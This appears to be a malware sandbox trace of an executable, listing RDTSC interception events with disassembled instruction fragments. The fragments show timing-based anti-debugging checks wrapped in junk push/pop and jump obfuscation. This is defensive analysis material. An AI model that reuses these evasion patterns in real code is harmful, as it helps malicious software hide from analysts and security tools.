                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E496F second address: 10E498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6644F246F4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4ADC second address: 10E4AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F664452DAD6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4AFF second address: 10E4B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4B03 second address: 10E4B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4B09 second address: 10E4B0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4DBF second address: 10E4DC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E4DC5 second address: 10E4DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F6644F246ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E5003 second address: 10E5008 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E515F second address: 10E5167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E5167 second address: 10E51BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F664452DADEh 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F664452DAD6h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F664452DAE8h 0x0000001f jmp 00007F664452DAE1h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E51BB second address: 10E51CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F6644F246E6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E609C second address: 10E60A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E60A2 second address: 10E60A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E60A8 second address: 10E60AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10E60AC second address: 10E60C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F6644F246E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EA32E second address: 10EA332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EEFEF second address: 10EEFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EEFF3 second address: 10EF017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F664452DAEEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF017 second address: 10EF01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF01D second address: 10EF021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF021 second address: 10EF04D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F8h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F6644F246E6h 0x00000013 jp 00007F6644F246E6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EF04D second address: 10EF051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10EEBA7 second address: 10EEBC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6644F246F3h 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10F14D8 second address: 10F14DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10F6A83 second address: 10F6A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10FF3EC second address: 10FF41C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F664452DAD6h 0x00000008 jmp 00007F664452DAE3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F664452DADFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DD5D second address: 102DD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B4E0 second address: 111B4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F664452DAD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B4F1 second address: 111B4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B4F5 second address: 111B4FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B7E3 second address: 111B7E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B7E8 second address: 111B7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jng 00007F664452DAD6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111B957 second address: 111B95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 111BAEA second address: 111BB14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F664452DAE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F664452DAE0h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1120139 second address: 112014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6644F246EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 112014C second address: 1120158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F664452DAD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1120158 second address: 112015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 112BC01 second address: 112BC05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 112BC05 second address: 112BC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA05 second address: 113EA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA09 second address: 113EA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA18 second address: 113EA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113EA1C second address: 113EA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F6644F246E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113E857 second address: 113E86A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 113E86A second address: 113E879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F6644F246E6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1141632 second address: 1141638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1141638 second address: 1141647 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6644F246E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155132 second address: 1155137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155414 second address: 115542E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6644F246EBh 0x0000000e jp 00007F6644F246E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115542E second address: 1155432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155432 second address: 1155442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F6644F246EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 11558A9 second address: 11558B3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155A22 second address: 1155A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F6644F246F1h 0x0000000f pop edi 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155B6B second address: 1155B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F664452DAD6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155CEE second address: 1155CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155CF2 second address: 1155D06 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F664452DADEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1155E69 second address: 1155E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115774C second address: 1157754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1157754 second address: 115775B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A10B second address: 115A10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A374 second address: 115A37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A37D second address: 115A389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A389 second address: 115A390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115A390 second address: 115A3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115D6D6 second address: 115D6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115F252 second address: 115F25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F664452DAD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115F25E second address: 115F263 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 115F263 second address: 115F269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1074797 second address: 107479B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502B0 second address: 57502B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502B6 second address: 57502BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502BB second address: 57502C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502C1 second address: 57502E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6644F246F9h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502E5 second address: 57502F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DADCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57502F5 second address: 575030A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 575030A second address: 5750333 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 1287h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F664452DAE6h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750333 second address: 575033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 575033A second address: 5750340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750340 second address: 5750375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F6644F246F8h 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750375 second address: 575038F instructions: 0x00000000 rdtsc 0x00000002 call 00007F664452DADBh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 575038F second address: 5750393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750393 second address: 5750399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5750399 second address: 57503B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57503D3 second address: 57503E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov bl, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57503E5 second address: 57503F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770647 second address: 5770656 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770656 second address: 57706E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F6644F246EEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 jmp 00007F6644F246EDh 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b jmp 00007F6644F246EEh 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F6644F246EAh 0x00000028 or eax, 7059FB78h 0x0000002e jmp 00007F6644F246EBh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007F6644F246F9h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov esi, edx 0x00000041 push ebx 0x00000042 pop esi 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57706E7 second address: 5770702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DAE7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770702 second address: 5770728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6644F246F7h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770728 second address: 5770745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770745 second address: 577074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 577074B second address: 5770761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F664452DADBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770761 second address: 57707BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov di, A196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6644F246F3h 0x00000017 sub si, EE1Eh 0x0000001c jmp 00007F6644F246F9h 0x00000021 popfd 0x00000022 jmp 00007F6644F246F0h 0x00000027 popad 0x00000028 push dword ptr [ebp+08h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
